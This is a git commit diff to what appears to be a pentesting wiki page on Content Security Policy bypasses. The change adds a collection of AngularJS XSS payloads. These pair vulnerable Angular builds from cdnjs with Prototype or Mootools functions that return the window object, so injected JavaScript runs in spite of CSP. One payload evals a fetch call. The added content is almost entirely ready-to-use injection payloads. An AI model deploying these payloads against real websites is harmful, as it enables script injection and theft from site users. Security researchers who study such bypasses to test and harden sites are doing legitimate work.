GitBook: [#3728] No subject
This commit is contained in:
parent
b4094867ca
commit
5b8d6de308
|
@ -187,24 +187,46 @@ Load a vulnerable version of angular and execute arbitrary JS:
|
|||
```markup
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
|
||||
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
|
||||
```
|
||||
|
||||
#### Other payloads:
|
||||
|
||||
```markup
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
|
||||
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
|
||||
<div ng-app ng-csp>
|
||||
{{$on.curry.call().alert(1)}}
|
||||
{{[].empty.call().alert([].empty.call().document.domain)}}
|
||||
{{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
|
||||
</div>
|
||||
|
||||
"><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
|
||||
|
||||
|
||||
"><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
|
||||
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>
|
||||
```
|
||||
|
||||
#### Payloads using Angular + a library with functions that return the `window` object ([check out this post](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
|
||||
|
||||
{% hint style="info" %}
|
||||
The post shows that you could **load** all **libraries** from `cdn.cloudflare.com` (or any other allowed JS libraries repo), execute all added functions from each library, and check **which functions from which libraries return the `window` object**.
|
||||
{% endhint %}
|
||||
|
||||
```markup
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
|
||||
<div ng-app ng-csp>
|
||||
{{$on.curry.call().alert(1)}}
|
||||
{{[].empty.call().alert([].empty.call().document.domain)}}
|
||||
{{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
|
||||
</div>
|
||||
|
||||
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
|
||||
<div ng-app ng-csp>
|
||||
{{$on.curry.call().alert('xss')}}
|
||||
</div>
|
||||
|
||||
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/mootools/1.6.0/mootools-core.min.js"></script>
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
|
||||
<div ng-app ng-csp>
|
||||
{{[].erase.call().alert('xss')}}
|
||||
</div>
|
||||
|
||||
|
||||
|
||||
```
|
||||
|
||||
### Third Party Endpoints + JSONP
|
||||
|
|
Loading…
Reference in New Issue